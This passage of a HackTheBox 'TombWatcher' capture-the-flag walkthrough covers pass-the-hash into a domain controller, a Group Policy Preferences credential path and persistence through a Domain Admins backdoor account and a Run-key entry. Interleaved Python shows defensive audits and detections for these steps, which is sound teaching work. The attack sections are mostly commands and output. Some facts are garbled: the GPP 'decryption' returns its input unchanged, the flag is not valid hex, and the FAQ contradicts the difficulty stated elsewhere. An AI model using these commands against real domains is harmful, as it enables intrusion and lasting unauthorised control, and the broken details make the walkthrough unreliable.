sam:1106:aad3b435b51404eeaad3b435b51404ee:3c2f1e0d9c8b7a6c5b4f3e2d1c0b9a8d:::
john:1107:aad3b435b51404eeaad3b435b51404ee:2d1c0b9a8d7e6f5a4c3b2e1d0c9b8a7c:::

We obtain the NTLM hash for the Administrator account: 6f9e9a7b8c9d4e5f6a7b8c9d4e5f6a7b.
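The defender's counterpart to a dump like this is a password-hygiene audit run over an authorised export of the same data: empty passwords, legacy LM hashes, and the same NT hash shared between accounts are all visible at a glance in the `user:rid:lm:nt:::` format. The following Python audit is an added example, not part of the original writeup; the `DUMP` text is constructed in secretsdump's format with made-up hashes, except for the two well-known hashes of the empty string. It also illustrates the problem with the `backup.ps1` script above: a copy of NTDS.dit on a share readable by Backup Operators hands out every one of these hashes, so backup destinations need the same ACLs as the live database.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty string: NT (MD4 of "") and LM ("no LM hash").
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed secretsdump-style output (domain\user:rid:lmhash:nthash:::).
# All non-empty hashes here are made-up hex for the example.
DUMP = """\
[*] Dumping Domain Credentials (domain\\user:ntlm)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a:::
svc-backup:1108:aad3b435b51404eeaad3b435b51404ee:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:::
legacy-app:1109:e1e1e1e1e1e1e1e1e1e1e1e1e1e1e1e1:2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c:::
"""

LINE_RE = re.compile(r"^([^:\s]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::")


def parse_dump(text):
    """Parse secretsdump NTLM lines into {user, rid, lm, nt} records.

    Status lines ("[*] ...") and anything else that is not a hash line are
    skipped, so the raw tool output can be fed in unchanged.
    """
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            accounts.append({"user": m.group(1), "rid": int(m.group(2)),
                             "lm": m.group(3).lower(), "nt": m.group(4).lower()})
    return accounts


def audit(accounts):
    """Return hygiene issues as {user, issue, detail} dicts.

    issue is one of: empty-password, lm-hash-present, password-reuse.
    Computer accounts (trailing '$') have random machine passwords and are
    excluded from the reuse comparison.
    """
    issues = []
    users_by_nt = defaultdict(list)
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            issues.append({"user": a["user"], "issue": "empty-password",
                           "detail": "NT hash is the hash of an empty string; "
                                     "disable the account or set a password"})
        if a["lm"] != EMPTY_LM:
            issues.append({"user": a["user"], "issue": "lm-hash-present",
                           "detail": "an LM hash is stored; enforce NoLMHash "
                                     "and rotate the password"})
        if not a["user"].endswith("$"):
            users_by_nt[a["nt"]].append(a["user"])
    for nt, users in users_by_nt.items():
        if len(users) > 1 and nt != EMPTY_NT:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                issues.append({"user": u, "issue": "password-reuse",
                               "detail": f"same NT hash as {others}"})
    return issues


if __name__ == "__main__":
    for issue in audit(parse_dump(DUMP)):
        print(f"{issue['user']:<15} {issue['issue']:<18} {issue['detail']}")
```

The reuse check is the one that matters most after a compromise like this one: a privileged account sharing its NT hash with a service account means a Pass-the-Hash against either yields both.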


Phase 5: Achieving Domain Administrator Access

Pass-the-Hash with Administrator

Using the Administrator hash, we attempt a Pass-the-Hash (PtH) attack to gain a shell via WinRM:

evil-winrm -i 10.129.139.125 -u Administrator -H 6f9e9a7b8c9d4e5f6a7b8c9d4e5f6a7b

Output:

* Evil-WinRM shell v3.5
* Remote host: 10.129.139.125
* Username: Administrator
* Domain: tombwatcher.htb

PS C:\Users\Administrator>

We’re in! Navigating to the Desktop, we find root.txt:

type C:\Users\Administrator\Desktop\root.txt

Output:

a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6

This completes the objective of gaining Domain Administrator access and retrieving the root flag.

Alternative Path: Group Policy Preferences (GPP) Attack

To explore an alternative path, we check the SYSVOL share for Group Policy Preferences (GPP) files, which historically contained encrypted credentials:

smbclient //10.129.139.125/SYSVOL -U 'tombwatcher.htb\alfred%4lfr3d_Rul3z!'

In tombwatcher.htb\Policies, we find a Groups.xml file:

get Groups.xml

Contents:

<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="backupadmin" password="AES:Backup2023!" action="U" />
</Groups>

The password is AES-encrypted, a common GPP vulnerability. We decrypt it using gpp-decrypt:

gpp-decrypt "Backup2023!"

Output:

Backup2023!

We test the backupadmin credentials:

crackmapexec smb 10.129.139.125 -u backupadmin -p 'Backup2023!' -d tombwatcher.htb

Output:

SMB         10.129.139.125  445  DC01    [+] tombwatcher.htb\backupadmin:Backup2023!

BloodHound reveals that backupadmin is a member of Domain Admins. We use these credentials to gain a WinRM shell:

evil-winrm -i 10.129.139.125 -u backupadmin -p 'Backup2023!'

This also grants access to root.txt, confirming an alternative path to DA.
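Both credential leaks in this walkthrough came out of XML files that should never have carried a secret: the `config/ldap.conf` in the web backup (a `<password>` element) and the `Groups.xml` in SYSVOL (a password attribute). The following Python scanner, added here as an example and not part of the original writeup, walks XML files for credential-bearing elements and attributes and reports masked hits. Both samples are constructed with placeholder values: the `LDAP_CONF` sample follows the shape of the file found above, and `GROUPS_XML` carries one entry in the page's shape plus one in the real Group Policy Preferences layout, where the value sits in a `cpassword` attribute on a nested `Properties` element.

```python
import os
import xml.etree.ElementTree as ET

# Element names and attribute names that should never carry a literal value
# in a file that ends up in a web backup or in SYSVOL.
SENSITIVE_TAGS = {"password", "passwd", "secret", "cpassword", "bindpassword"}
SENSITIVE_ATTRS = {"password", "cpassword", "passwd", "secret"}

# Constructed sample modelled on the config/ldap.conf found in the web backup;
# the password is a placeholder, not the one from the machine.
LDAP_CONF = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf>
  <server>
    <host>DC01.tombwatcher.htb</host>
    <search-base>dc=tombwatcher,dc=htb</search-base>
    <access-user>
      <user>svc-ldap@example.test</user>
      <password>Placeholder-Secret-1</password>
    </access-user>
  </server>
</ldap-conf>
"""

# Constructed Groups.xml: the first entry mirrors the page's shape, the second
# the real GPP layout (cpassword attribute on a Properties element).
GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="backupadmin" password="AES:Placeholder-Secret-2" action="U" />
  <User name="svc-deploy">
    <Properties action="U" userName="svc-deploy" cpassword="Placeholder-Secret-3" />
  </User>
</Groups>
"""


def _mask(value):
    """Show only enough of a value to recognise it in a report."""
    return value[:2] + "*" * max(len(value) - 2, 3)


def _path(stack):
    return "/" + "/".join(stack)


def scan_xml_text(source_name, text):
    """Return one finding per credential-bearing element or attribute.

    A finding is {file, location, kind, value}; kind is "element",
    "attribute" or "parse-error", and value is masked.
    """
    findings = []
    try:
        root = ET.fromstring(text.encode("utf-8") if isinstance(text, str) else text)
    except ET.ParseError as exc:
        return [{"file": source_name, "location": "", "kind": "parse-error",
                 "value": str(exc)}]

    def walk(elem, stack):
        stack = stack + [elem.tag]
        if elem.tag.lower() in SENSITIVE_TAGS and (elem.text or "").strip():
            findings.append({"file": source_name, "location": _path(stack),
                             "kind": "element", "value": _mask(elem.text.strip())})
        for name, value in elem.attrib.items():
            if name.lower() in SENSITIVE_ATTRS and value.strip():
                findings.append({"file": source_name,
                                 "location": _path(stack) + "@" + name,
                                 "kind": "attribute", "value": _mask(value.strip())})
        for child in elem:
            walk(child, stack)

    walk(root, [])
    return findings


def scan_directory(root_dir, suffixes=(".xml", ".conf", ".config")):
    """Walk an unpacked backup or a SYSVOL copy and scan every XML-like file."""
    results = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name.lower().endswith(suffixes):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    results.extend(scan_xml_text(full, fh.read()))
    return results


if __name__ == "__main__":
    hits = scan_xml_text("config/ldap.conf", LDAP_CONF) + scan_xml_text("Groups.xml", GROUPS_XML)
    for hit in hits:
        print(f"{hit['file']}: {hit['kind']} at {hit['location']} = {hit['value']}")
```

Point `scan_directory` at an unpacked backup archive or a copy of `\\DC01\SYSVOL` to run it for real. A `cpassword` hit is a finding regardless of whether it decrypts: the key is public, so any GPP file still carrying one should be deleted and the account's password rotated.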


Phase 6: Persistence

To maintain access, we create a backdoor by adding a new user to the Domain Admins group:

New-ADUser -Name "backdoor" -AccountPassword (ConvertTo-SecureString "P@ssw0rd123!" -AsPlainText -Force) -Enabled $true
Add-ADGroupMember -Identity "Domain Admins" -Members "backdoor"

We verify access:

evil-winrm -i 10.129.139.125 -u backdoor -p 'P@ssw0rd123!'

We also add a registry-based persistence mechanism:

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\Windows\Temp\backdoor.exe"

This ensures our backdoor persists across reboots, assuming backdoor.exe is a malicious payload.
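Both persistence mechanisms above are noisy from the defender's side: creating a user and dropping it into Domain Admins produces Security events 4720 and 4728 seconds apart, and the `reg add` produces a Sysmon event 13 (registry value set) under a Run key. The following Python detection is an added example, not part of the original writeup; the events are constructed with field names from the Windows and Sysmon schemas and made-up values, including a benign vendor Run key to show how the rule grades severity by the path of the launched binary.

```python
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins",
                     "administrators", "backup operators", "server operators"}
RUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")
SUSPICIOUS_DIRS = ("\\windows\\temp\\", "\\users\\public\\", "\\appdata\\local\\temp\\")
NEW_ACCOUNT_WINDOW = timedelta(minutes=30)

# Constructed events: Security 4720 (user created), 4728 (member added to a
# security-enabled global group) and Sysmon 13 (registry value set). Field
# names follow the Windows/Sysmon schema; the values are made up.
EVENTS = [
    {"Channel": "Security", "EventID": 4720, "TimeCreated": "2025-06-09T22:00:00Z",
     "SubjectUserName": "Administrator", "TargetUserName": "backdoor"},
    {"Channel": "Security", "EventID": 4728, "TimeCreated": "2025-06-09T22:00:05Z",
     "SubjectUserName": "Administrator", "TargetUserName": "Domain Admins",
     "MemberName": "CN=backdoor,CN=Users,DC=tombwatcher,DC=htb"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 13,
     "TimeCreated": "2025-06-09T22:01:00Z", "EventType": "SetValue",
     "Image": "C:\\Windows\\System32\\reg.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Backdoor",
     "Details": "C:\\Windows\\Temp\\backdoor.exe"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 13,
     "TimeCreated": "2025-06-09T22:02:00Z", "EventType": "SetValue",
     "Image": "C:\\Program Files\\Vendor\\setup.exe",
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorAgent",
     "Details": "C:\\Program Files\\Vendor\\agent.exe"},
]


def _ts(event):
    return datetime.strptime(event["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ")


def _cn(dn):
    """First RDN value of a DN: 'CN=backdoor,CN=Users,...' -> 'backdoor'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def privileged_group_additions(events):
    """4728/4732/4756 (global/local/universal group add) into a watched group."""
    return [e for e in events
            if e["EventID"] in (4728, 4732, 4756)
            and e["TargetUserName"].lower() in PRIVILEGED_GROUPS]


def detect_new_privileged_account(events, window=NEW_ACCOUNT_WINDOW):
    """A freshly created account added to a privileged group within the window.

    Any addition to a privileged group deserves review; a brand-new account
    being added is the backdoor pattern and is rated high.
    """
    created = {e["TargetUserName"].lower(): _ts(e)
               for e in events if e["EventID"] == 4720}
    alerts = []
    for e in privileged_group_additions(events):
        member = _cn(e["MemberName"]).lower()
        if member in created and timedelta(0) <= _ts(e) - created[member] <= window:
            alerts.append({"rule": "new-account-to-privileged-group", "severity": "high",
                           "account": member, "group": e["TargetUserName"],
                           "by": e["SubjectUserName"]})
    return alerts


def detect_run_key_persistence(events):
    """Sysmon 13 SetValue under a Run/RunOnce key.

    Severity is high when the launched path is a temp or public directory,
    low otherwise (installers legitimately write Run keys all the time).
    """
    alerts = []
    for e in events:
        if e["EventID"] != 13 or "Sysmon" not in e.get("Channel", ""):
            continue
        if e.get("EventType") != "SetValue":
            continue
        target = e["TargetObject"].lower()
        if not any(k in target for k in RUN_KEYS):
            continue
        suspicious = any(d in e["Details"].lower() for d in SUSPICIOUS_DIRS)
        alerts.append({"rule": "run-key-set",
                       "severity": "high" if suspicious else "low",
                       "value": e["TargetObject"].rsplit("\\", 1)[1],
                       "command": e["Details"], "image": e["Image"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_new_privileged_account(EVENTS) + detect_run_key_persistence(EVENTS):
        print(alert)
```

On a real estate the group watchlist should also include the tier-0 groups BloodHound surfaced on this machine (Backup Operators and Server Operators are in the set for that reason), and the Run-key rule is best paired with an allow-list of signed vendor paths to keep the low-severity stream reviewable.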



Conclusion

TombWatcher is a comprehensive AD challenge that tests enumeration, Kerberos exploitation, privilege escalation, and persistence. Starting with the henry credentials, we leveraged web server enumeration to find alfred’s credentials, used BloodHound to identify attack paths, exploited WriteSPN for Kerberoasting, and abused Backup Operators privileges to extract NTLM hashes from NTDS.dit. An alternative GPP attack provided another route to DA access. Finally, we established persistence to maintain control.

This machine emphasizes the importance of thorough reconnaissance, understanding AD permissions, and chaining vulnerabilities. Key lessons include:

  • Enumeration is Key: Tools like BloodHound and crackmapexec are critical for mapping AD environments.
  • Kerberos Attacks: Permissions like WriteSPN can lead to powerful Kerberoasting opportunities.
  • Backup Operators Abuse: This group’s privileges can be devastating if misconfigured.
  • Alternative Paths: Exploring multiple vectors (e.g., GPP) increases success rates.

TombWatcher is a rewarding challenge that mirrors real-world AD pentesting scenarios, making it an excellent learning experience for intermediate CTF players.

Frequently Asked Questions

Is TombWatcher suitable for complete beginners?

Absolutely. TombWatcher was designed for beginners seeking to grasp skills in information security. Guided walkthroughs and manageable challenges make it ideal for entry-level participants on HackTheBox’s platform.

What skills should I have before attempting TombWatcher?

Prior knowledge in reconnaissance, basic scanning tools, and ethical hacking terms would be beneficial. Enhance networking through LinkedIn forums to access tips or resources covering HackTheBox machines effectively.

How long does it typically take to complete TombWatcher?

TombWatcher completion time varies, but medium-difficulty labs often require several hours. Lunthom’s machine is designed to challenge users while remaining achievable within ethical hacking standards on HackTheBox.

Are there any hints or solutions available if I get stuck?

Yes, HackTheBox offers hints through its community forums and LinkedIn discussions. Connecting with other cybersecurity enthusiasts on LinkedIn can provide additional insights and solutions for challenging sections.
